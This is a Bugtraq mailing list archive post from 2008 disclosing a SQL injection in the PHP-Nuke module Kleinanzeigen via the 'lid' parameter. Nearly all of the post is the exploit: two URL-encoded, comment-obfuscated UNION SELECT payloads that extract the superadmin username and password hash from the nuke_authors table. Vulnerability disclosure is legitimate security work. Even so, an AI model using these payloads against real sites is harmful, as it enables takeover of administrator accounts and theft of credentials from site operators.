Bugtraq mailing list archives

PHP-NUKE module Kleinanzeigen SQL injection (lid)

From: lovebug () hotmail it
Date: Tue, 5 Aug 2008 19:43:39 -0600

##########################################################
#   Rbt-4 crew
#  http://www.rbt-4.net
#   Author : Lovebug
#----------------------------
#
#
#   Remote Sql injection Php-Nuke module name Kleinanzeigen 
##########################################################
# modules.php?name=Kleinanzeigen&a_op=visit&lid=[sql]
# 
#                         Exploit 
#
# username :  
-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A
# pwd : 
-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A
##########################################################

Current thread:

PHP-NUKE module Kleinanzeigen SQL injection (lid) lovebug (Aug 06)